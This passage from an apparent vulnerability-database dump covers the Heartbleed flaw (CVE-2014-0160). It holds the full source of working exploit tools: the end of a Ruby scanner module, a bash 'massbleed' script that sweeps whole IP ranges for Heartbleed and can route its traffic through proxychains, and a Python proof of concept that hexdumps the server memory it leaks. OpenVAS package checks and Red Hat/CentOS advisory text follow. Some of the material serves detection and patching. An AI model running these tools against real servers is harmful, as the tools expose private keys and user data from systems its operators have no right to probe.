\nif res.nil? || res =~ /stream:error/ || res !~ /starttls/i \nprint_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/ \nreturn nil \nend \nmsg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\" \nsock.put(msg) \nsock.get_once \nend \n \ndef run_host(ip) \nconnect \n \nunless datastore['STARTTLS'] == 'None' \nvprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\") \nres = self.send(TTLS_CALLBACKS[datastore['STARTTLS']]) \nif res.nil? \nvprint_error(\"#{peer} - STARTTLS failed...\") \nreturn \nend \nend \n \nvprint_status(\"#{peer} - Sending Client Hello...\") \nsock.put(client_hello) \n \nserver_hello = sock.get \nunless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE \nvprint_error(\"#{peer} - Server Hello Not Found\") \nreturn \nend \n \nvprint_status(\"#{peer} - Sending Heartbeat...\") \nheartbeat_length = 16384 \nsock.put(heartbeat(heartbeat_length)) \nhdr = sock.get_once(5) \nif hdr.blank? \nvprint_error(\"#{peer} - No Heartbeat response...\") \nreturn \nend \n \nunpacked = hdr.unpack('Cnn') \ntype = unpacked[0] \nversion = unpacked[1] # must match the type from client_hello \nlen = unpacked[2] \n \n# try to get the TLS error \nif type == ALERT_RECORD_TYPE \nres = sock.get_once(len) \nalert_unp = res.unpack('CC') \nalert_level = alert_unp[0] \nalert_desc = alert_unp[1] \nmsg = \"Unknown error\" \n# http://tools.ietf.org/html/rfc5246#section-7.2 \ncase alert_desc \nwhen 0x46 \nmsg = \"Protocol error. Looks like the chosen protocol is not supported.\" \nend \nprint_error(\"#{peer} - #{msg}\") \ndisconnect \nreturn \nend \n \nunless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']] \nvprint_error(\"#{peer} - Unexpected Heartbeat response\") \ndisconnect \nreturn \nend \n \nvprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\") \nheartbeat_data = sock.get_once(heartbeat_length) # Read the magic length... \nif heartbeat_data \nprint_good(\"#{peer} - Heartbeat response with leak\") \nreport_vuln({ \n:host => rhost, \n:port => rport, \n:name => self.name, \n:refs => self.references, \n:info => \"Module #{self.fullname} successfully leaked info\" \n}) \nvprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\") \nelse \nvprint_error(\"#{peer} - Looks like there isn't leaked information...\") \nend \nend \n \ndef heartbeat(length) \npayload = \"\\x01\" # Heartbeat Message Type: Request (1) \npayload << [length].pack(\"n\") # Payload Length: 16384 \n \nssl_record(HEARTBEAT_RECORD_TYPE, payload) \nend \n \ndef client_hello \n# Use current day for TLS time \ntime_temp = Time.now \ntime_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i \n \nhello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS \nhello_data << [time_epoch].pack(\"N\") # Time in epoch format \nhello_data << Rex::Text.rand_text(28) # Random \nhello_data << \"\\x00\" # Session ID length \nhello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites length (102) \nhello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites \nhello_data << \"\\x01\" # Compression methods length (1) \nhello_data << \"\\x00\" # Compression methods: null \n \nhello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat) \nhello_data_extensions << \"\\x00\\x01\" # Extension length \nhello_data_extensions << \"\\x01\" # Extension data \n \nhello_data << [hello_data_extensions.length].pack(\"n\") \nhello_data << hello_data_extensions \n \ndata = \"\\x01\\x00\" # Handshake Type: Client Hello (1) \ndata << [hello_data.length].pack(\"n\") # Length \ndata << hello_data \n \nssl_record(HANDSHAKE_RECORD_TYPE, data) \nend \n \ndef ssl_record(type, data) \nrecord = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn') \nrecord << data \nend \nend \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126101/openssl_heartbleed.rb.txt"}, {"lastseen": "2016-12-05T22:12:31", "description": "", "published": "2014-04-23T00:00:00", "type": "packetstorm", "title": "Mass Bleed 20140423", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-23T00:00:00", "id": "PACKETSTORM:126288", "href": "https://packetstormsecurity.com/files/126288/Mass-Bleed-20140423.html", "sourceData": "`#!/bin/bash \n# massbleed.sh 20140423 by 1N3 \n# http://treadstonesecurity.blogspot.ca \n# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy] \n# \n# This script has four main functions with the ability to proxy all connections: \n# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16) \n# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443) \n# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single) \n# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet) \n# \n# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work. \n# USAGE EXAMPLES: \n# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy) \n# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy) \n# (example: sh massbleed.sh 127.0.0.1 single 0 proxy) \n# (example: sh massbleed.sh 192.168.0. subnet 0 proxy) \n# \n# Prerequisites: \n# Is the heartbleed POC present? \n# Is unicornscan installed? \n# Is nmap installed? \n \necho \"(--==== http://treadstonesecurity.blogspot.ca\" \necho \"(--==== massbleed.sh 20140423 by 1N3\" \necho \"\" \n \nHEARTBLEED=`ls heartbleed.py` \nUNICORNSCAN=`which unicornscan` \nNMAP=`which nmap` \nRANGE=$1 \nALL_PORTS=$2 \nCUSTOM_PORT=$3 \nPROXY=$4 \nPORT_RANGE=\"1-65000\" \n \nif [ \"$HEARTBLEED\" != \"heartbleed.py\" ]; then \necho \"(--==== heartbleed.py not found!\" \necho \"(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py\" \nexit \nfi \n \nif [ \"$UNICORNSCAN\" == \"\" ]; then \necho \"(--==== unicornscan not installed! Exiting...\" \nexit \nfi \n \nif [ \"$NMAP\" == \"\" ]; then \necho \"(--==== nmap not installed! Exiting...\" \nexit \nfi \n \nif [ -z \"$1\" ]; then \necho \"(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]\" \nexit \nfi \n \nif [ \"$PROXY\" = \"proxy\" ]; then \necho \"(--==== scanning via proxy...\" \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nif [ \"$CUSTOM_PORT\" != \"0\" ]; then \necho \"(--==== Checking $RANGE:$CUSTOM_PORT\" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null \nelse \nfor a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `proxychains unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \nproxychains python heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && proxychains python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nelse \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nfor a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \npython heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nfi \n \necho \"(--==== scan complete!\" \nexit \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126288/massbleed.sh.txt"}, {"lastseen": "2016-12-05T22:11:38", "description": "", "published": "2014-04-09T00:00:00", "type": "packetstorm", "title": "TLS Heartbeat Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "PACKETSTORM:126072", "href": "https://packetstormsecurity.com/files/126072/TLS-Heartbeat-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/env python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n# Modified by Csaba Fitzl for multiple SSL / TLS version support \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nversion = [] \nversion.append(['SSL 3.0','03 00']) \nversion.append(['TLS 1.0','03 01']) \nversion.append(['TLS 1.1','03 02']) \nversion.append(['TLS 1.2','03 03']) \n \ndef create_hello(version): \nhello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \nreturn hello \n \ndef create_hb(version): \nhb = h2bin('18 ' + version + ' 00 03 01 40 00') \nreturn hb \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s,hb): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \nfor i in range(len(version)): \nprint 'Trying ' + version[i][0] + '...' \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(create_hello(version[i][1])) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(create_hb(version[i][1])) \nif hit_hb(s,create_hb(version[i][1])): \n#Stop if vulnerable \nbreak \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126072/heartbeat2.py.txt"}], "openvas": [{"lastseen": "2019-05-29T18:36:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "Oracle Linux Local Security Checks ELSA-2014-0376", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123430", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123430", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-0376", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0376.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123430\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:43 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0376\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0376 - openssl security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0376\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0376.html\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-04-08T00:00:00", "id": "OPENVAS:1361412562310871154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871154", "type": "openvas", "title": "RedHat Update for openssl RHSA-2014:0376-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:0376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871154\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 12:13:57 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"RedHat Update for openssl RHSA-2014:0376-01\");\n\n\n script_tag(name:\"affected\", value:\"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0376-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T16:39:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "OpenSSL is prone to an information disclosure vulnerability.\n\n This NVT has been merged into the NVT ", "modified": "2020-04-02T00:00:00", "published": "2014-04-09T00:00:00", "id": "OPENVAS:1361412562310105010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105010", "type": "openvas", "title": "OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability (STARTTLS Check)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability STARTTLS Check\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105010\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-09 09:54:09 +0200 (Wed, 09 Apr 2014)\");\n script_name(\"OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability (STARTTLS Check)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/66690\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to gain access to sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted TLS request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The TLS and DTLS implementations do not properly handle\n Heartbeat Extension packets.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"summary\", value:\"OpenSSL is prone to an information disclosure vulnerability.\n\n This NVT has been merged into the NVT 'OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability' (OID: 1.3.6.1.4.1.25623.1.0.103936).\");\n\n script_tag(name:\"affected\", value:\"OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and\n 1.0.1 are vulnerable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-04-08T00:00:00", "id": "OPENVAS:1361412562310881918", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881918", "type": "openvas", "title": "CentOS Update for openssl CESA-2014:0376 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:0376 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881918\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:0376 centos6\");\n\n script_tag(name:\"affected\", value:\"openssl on CentOS 6\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0376\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 